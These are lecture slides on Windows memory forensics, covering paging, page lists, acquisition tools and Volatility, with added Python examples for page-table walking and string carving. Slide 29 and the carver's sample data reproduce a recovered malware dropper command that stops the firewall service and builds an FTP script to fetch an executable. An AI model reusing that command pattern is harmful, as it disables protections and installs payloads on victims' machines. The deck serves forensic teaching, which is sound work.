
Memory Forensics

Memory Forensics presentation from one of my lectures. I have tried to explain the functioning of memory in a 32-bit architecture, how paging works, how Windows manages its memory pages and how the memory forensics job is done. The forensics part focuses on collecting data and analyzing it.


  1. Memory Forensics. Shri Boonlia Prince Komal. "Don't pull the plug."
     Contact: Gmail boonlia@gmail.com; Facebook profile.php?id=1701055902 (or search for boonliasecurity@gmail.com); Twitter: (not given on the slide)
  2. Live / Dead Memory Forensics
     • What is live memory and what is dead memory?
       – Live memory: RAM (the target of live memory forensics)
       – Dead memory: the pagefile and the hibernation file, both on the hard drive
     • Where is the hibernation file? (hiberfil.sys, in the root of the system drive)
  3. A Few Basics of RAM
     • A grid of capacitors (DRAM)
     • A "bucket with holes" (the charge leaks away)
     • Random access: any location can be read in the same time
     • A parity bit for error reporting
  4. A Grid of Capacitors
     • Row select: set high for the selected row
     • Column select: set high for the selected column
     • Read/write line: set high for a read and low for a write
     • Data flows in or out depending on the R/W state
     • Address bus: carries the address of the memory location
     • Data bus: carries the data in and out over the same wires (the read/write bus, or simply the data bus)
  5. Bucket with Holes (DRAM)
     • Capacitors by their very nature discharge rapidly
     • Any read or write operation adds to that discharge
     • This calls for regular refreshing, in which the entire contents are read and written back
     • SRAM instead holds each bit in a transistor flip-flop (typically six transistors per cell) that shows an on or off state and needs no refresh
  6. Memory Address Space
     Byte-addressable memory: the smallest addressable unit is 8 bits.

                              32-bit processor      64-bit processor
       Address space          2^32 = 4 GB           2^64 = about 17 billion GB
       Typical implementation 40-bit = 1024 GB      50-bit = 1024 TB
  7. Memory Management at a Glance
     [Figure: processor, memory manager and application, with the question "DMA?" (direct memory access bypasses the processor and the memory manager)]
  8. Need for a Memory Manager
     • Protect the operating system and kernel memory space
     • Prevent application violations (one application accessing another application's memory)
     • Allocate memory judiciously
     • Allow multiple applications to coexist
     • Improve memory utilization efficiency
     • Extend the memory capacity via swapping
     • Give applications a simpler platform to use memory (a virtual address space): you do not have to write two programs for 1 GB and 2 GB RAM machines
     • Manage shared memory
  9. User Mode vs Kernel Mode
     • Memory protection
     • Location of both modes in RAM (by default the lower 2 GB of the 4 GB virtual address space is user mode and the upper 2 GB is kernel mode)
     • The /3GB switch in boot.ini (gives user mode 3 GB and kernel mode 1 GB)
     • Where the page directory and page table entries are stored
     • What if user mode needs to access something in kernel mode? (It must go through a system call; user-mode code cannot touch kernel pages directly)
  10. User Mode vs Kernel Mode Memory
     [Figure: user-mode and kernel-mode regions of memory]
  11. Kernel Mode / User Mode
     [Figure: the 4 GB virtual address space split between kernel mode and user mode, showing where the page table and page directory live, without PAE and with PAE]
  12. Overview of Virtual Memory Management on the x86 Processor
     • TLB: Translation Lookaside Buffer (the processor's cache of recent virtual-to-physical translations)
  13. Memory Management in Windows
     • Windows on the 32-bit x86 architecture can address up to 4 GB of memory
     • Windows can give each of many processes its own 4 GB of address space even though the total physical memory is at most 4 GB
     • This is done using the x86 feature called paging
     • The default page size is 4 KB (x86 also supports large pages)
  14. Virtual Memory to Physical Memory
     [Figure: mapping of virtual pages to physical frames]
  15. The Paging Process in the x86 Processor
     [Figure: the page-directory / page-table walk from a virtual address to a physical address]
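The walk that slides 12 to 15 illustrate, as an added example that is not part of the presentation: a two-level x86 (non-PAE) translation over a flat byte buffer shaped like a raw dd-style dump. The page directory, page table and CR3 value here are constructed for the demonstration; in a real Windows dump CR3 is the process's DirectoryTableBase, and this walk is how an analysis tool resolves a process's virtual addresses against the physical image. The large-page (PS bit) branch goes beyond the slides, which only show 4 KB pages.

```python
import struct

PAGE_MASK = 0xFFFFF000   # bits 31:12 of a PDE/PTE hold the physical frame
PRESENT = 1 << 0         # bit 0: entry is valid
LARGE_PAGE = 1 << 7      # PDE bit 7 (PS): the PDE maps a 4 MB page directly


class PageFault(Exception):
    """Raised when a PDE or PTE on the walk is not present (paged out or unmapped)."""


class PhysicalMemory:
    """Flat byte view of physical memory, the shape of a raw .img dump (constructed here)."""

    def __init__(self, size: int):
        self.buf = bytearray(size)

    def read32(self, paddr: int) -> int:
        return struct.unpack_from("<I", self.buf, paddr)[0]

    def write32(self, paddr: int, value: int) -> None:
        struct.pack_into("<I", self.buf, paddr, value)

    def read(self, paddr: int, n: int) -> bytes:
        return bytes(self.buf[paddr:paddr + n])


def translate(mem: PhysicalMemory, cr3: int, vaddr: int) -> int:
    """Resolve one 32-bit virtual address through the page directory and page table.

    vaddr layout: [31:22] page-directory index, [21:12] page-table index, [11:0] byte offset.
    cr3 holds the physical address of the 4 KB page directory.
    """
    pd_index = (vaddr >> 22) & 0x3FF
    pt_index = (vaddr >> 12) & 0x3FF
    offset = vaddr & 0xFFF

    pde = mem.read32((cr3 & PAGE_MASK) + pd_index * 4)
    if not pde & PRESENT:
        raise PageFault(f"PDE {pd_index} not present for VA {vaddr:#010x}")
    if pde & LARGE_PAGE:
        # 4 MB page: PDE bits 31:22 are the frame base, VA bits 21:0 are the offset
        return (pde & 0xFFC00000) | (vaddr & 0x3FFFFF)

    pte = mem.read32((pde & PAGE_MASK) + pt_index * 4)
    if not pte & PRESENT:
        raise PageFault(f"PTE {pt_index} not present for VA {vaddr:#010x}")
    return (pte & PAGE_MASK) | offset


def is_mapped(mem: PhysicalMemory, cr3: int, vaddr: int) -> bool:
    """True if the walk succeeds; a forensic tool skips (or reports) unmapped pages."""
    try:
        translate(mem, cr3, vaddr)
        return True
    except PageFault:
        return False


def read_virtual(mem: PhysicalMemory, cr3: int, vaddr: int, n: int) -> bytes:
    """Read n bytes at a virtual address (kept within one page for brevity)."""
    return mem.read(translate(mem, cr3, vaddr), n)


def build_sample_memory():
    """Constructed 64 KB 'dump': page directory at 0x1000, one page table at 0x2000."""
    mem = PhysicalMemory(0x10000)
    cr3 = 0x1000
    # PDE[1] covers VA 0x00400000-0x007FFFFF -> page table at physical 0x2000
    mem.write32(cr3 + 1 * 4, 0x2000 | PRESENT)
    # PTE[5] of that table covers VA 0x00405000 -> physical frame 0x3000
    mem.write32(0x2000 + 5 * 4, 0x3000 | PRESENT)
    # PDE[3] covers VA 0x00C00000-0x00FFFFFF as one 4 MB page at physical 0x00400000
    mem.write32(cr3 + 3 * 4, 0x00400000 | LARGE_PAGE | PRESENT)
    # A recognisable marker in the mapped frame so the virtual read can be checked
    mem.buf[0x3000:0x3002] = b"MZ"
    return mem, cr3


if __name__ == "__main__":
    mem, cr3 = build_sample_memory()
    print(f"VA 0x00405ABC -> PA {translate(mem, cr3, 0x00405ABC):#x}")
    print(f"VA 0x00C12345 -> PA {translate(mem, cr3, 0x00C12345):#x} (4 MB page)")
    print("VA 0x00407000 mapped:", is_mapped(mem, cr3, 0x00407000))
```

The walk is what separates a raw dump from something you can reason about: the same physical frame can appear in several processes' address spaces (shared DLLs), and a page that is not present in the page tables must be looked for in the pagefile, which is why tools that also capture the pagefile (slide 23) recover more.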
  16. A Few Concepts in Windows Memory Management
     Process memory usage counters:
     • Virtual size
     • Private bytes
     • Working set
     • Shared memory
     [Figure: a process with a 2 GB virtual size on a machine with, say, 1 GB of physical memory; private bytes and the working set are the parts that are actually committed and resident, shared memory is counted across processes]
  17. Page Lists in Windows (do not confuse with page tables)
     1) Zero page list: pages that carry no data (already zeroed) and are ready to be assigned to a process
     2) Free page list: pages not in use by any process but still containing old data (zeroed before being handed to a process)
     3) Standby page list: unmodified pages removed from a process's working set; their contents are still valid on disk, so they can be reclaimed or reused
     4) Modified page list: modified pages removed from a process's working set that have not yet been written back to the pagefile or the mapped file
  18. Windows Memory Management at a Glance
     [Figure: a process working set exchanging pages with the modified, standby, zero and free page lists and with the hard drive (pagefile / mapped file); unmodified pages that are needed again come back from the standby list, modified pages are saved to disk, and memory that is no longer needed is freed. Flows that occur when memory use is exceeded or in a memory crunch are shown in red.]
  19. Memory Management in the OS
     The memory manager provides:
     • Large address space: user programs can reference more memory than physically exists
     • Protection: the memory of a process is private and cannot be read or modified by another process; the memory manager also prevents processes from overwriting code and read-only data
     • Memory mapping: clients can map a file into an area of virtual memory and access the file as memory
     • Fair access to physical memory: the memory manager ensures that all processes have fair access to the machine's memory resources, ensuring reasonable system performance
     • Shared memory: the memory manager allows processes to share some portion of their memory; for example, executable code is usually shared among processes
  20. What Can Be Found in Memory
     • The running processes
     • The running threads
     • Passwords, keys and other secrets
     • Live registry hives
     • Live chats and login information
     • Malware presence, including rootkits
     • Open connections to the Internet / network
     • Open files and their remnants
     • In fact, anything the processor works upon
  21. The Process of Memory Forensics
     • Capture the memory
     • Analyze the memory
     • Reconstruct the memory state
     • Reconstruct the entire scenario with the disk image and memory image in conjunction
  22. Various Formats
     • Raw dump (linear format) (.img / .dd)
     • Windows crash dump format (MEMORY.DMP): written by the kernel after a BSoD, while the system is frozen
     • hiberfil.sys format (compressed)
     • Commercial tool formats
       – winen: .E01 (EnCase evidence file)
       – .vmem (VMware)
       – .bin (Hyper-V saved state)
       – FastDump Pro (.hpak)
  23. Capturing the Memory
     • Tools
       – dd / dcfldd / dc3dd: dd if=\\.\PhysicalMemory of=f:\memory.img
       – Memdump
       – win32dd
       – Nigilant32
       – FastDump (FastDump Pro dumps the pagefile contents too)
       – MDD
       – winen (EnCase)
       – Memoryze (dumps the pagefile contents too)
       – LiveKd.exe (from Microsoft Sysinternals)
  24. Brief demo of memory acquisition with win32dd
  25. Hardware Approach
     • FireWire port device (DMA: the device reads physical memory without the OS's involvement)
     • PCI device by Brian Carrier and Joe Grand: the Tribble device
  26. Analysing the Memory Dump
     • String search with strings.exe
     • Pattern search with the grep command
     • DFRWS 2005 memory challenge: memparser
     • 2007: Aaron Walters, the Volatility framework
     • Several plugins for Volatility
     • pdfbook, pdgmail, pdymail, Skypeeks
     • memparser
     • Memoryze and Audit Viewer
  27. Volatility Framework
     • What is Volatility
     • Volatility plugins
     • Using Volatility on memory dumps
     • Demo with a few options for analysis
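The first two analysis steps of slide 26, string search and grep, as an added example that is not part of the presentation and not Volatility code: a carver that pulls both ASCII and UTF-16LE strings out of a raw dump with their physical offsets, then filters them by regex. Plain strings.exe without a Unicode option misses the UTF-16LE form in which Windows stores paths, registry keys and much of what a process has in memory. The dump bytes below are constructed for the demonstration.

```python
import re
from typing import Iterator, List, NamedTuple

MIN_LEN = 6  # minimum characters before a run counts as a string, as in strings.exe


class Hit(NamedTuple):
    offset: int     # physical offset in the dump, usable as a pivot for other tools
    encoding: str   # "ascii" or "utf-16le"
    text: str


def carve_strings(data: bytes, min_len: int = MIN_LEN) -> Iterator[Hit]:
    """Yield printable ASCII runs and UTF-16LE runs (printable byte, NUL) of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(data):
        yield Hit(m.start(), "ascii", m.group().decode("ascii"))
    for m in utf16_re.finditer(data):
        yield Hit(m.start(), "utf-16le", m.group().decode("utf-16le"))


def grep_dump(data: bytes, pattern: str, min_len: int = MIN_LEN) -> List[Hit]:
    """The 'grep' step: carved strings whose text matches the regex, in offset order."""
    rx = re.compile(pattern, re.IGNORECASE)
    return sorted((h for h in carve_strings(data, min_len) if rx.search(h.text)),
                  key=lambda h: h.offset)


def build_sample_dump() -> bytes:
    """Constructed stand-in for a raw memory image: non-printable filler around three strings."""
    filler = bytes([0x00, 0x01, 0x7F, 0xFF] * 64)           # 256 bytes, nothing printable
    ascii_cmd = b"cmd.exe /c net1 stop sharedaccess"        # ASCII, as a shell would hold it
    wide_path = "C:\\Windows\\System32\\cmd.exe".encode("utf-16le")  # how Windows stores paths
    too_short = b"abc"                                       # below MIN_LEN, must not be reported
    return filler + ascii_cmd + b"\x00" * 17 + wide_path + b"\x00\x00" + too_short + filler


if __name__ == "__main__":
    dump = build_sample_dump()
    for hit in sorted(carve_strings(dump), key=lambda h: h.offset):
        print(f"{hit.offset:#010x} {hit.encoding:8} {hit.text}")
    print("grep 'net1 stop':", grep_dump(dump, r"net1\s+stop"))
```

String hits are only a starting point: an offset tells you where in physical memory the text sits, but not which process it belongs to, which is what the page-table walk (slide 15) and a structured tool such as Volatility add.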
  28. Cold Boot Attack
     • Memory does not empty that fast
     • Even 30 seconds to minutes after the system is powered off, the DRAM still holds data
     • This time can be prolonged if the memory is cooled: a coolant spray instantly drops the temperature to around -50 °C
  29. Case Study
     Shell command recovered from memory (a dropper that stops the Windows Firewall/ICS service and builds an FTP script file):
     C:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
  30. You can reach us at: Gmail bhansalireena@gmail.com; Facebook profile.php?id=1701055902 (or search for my mail id); Twitter !/boonlia
     nullcon Goa 2010, http://nullcon.net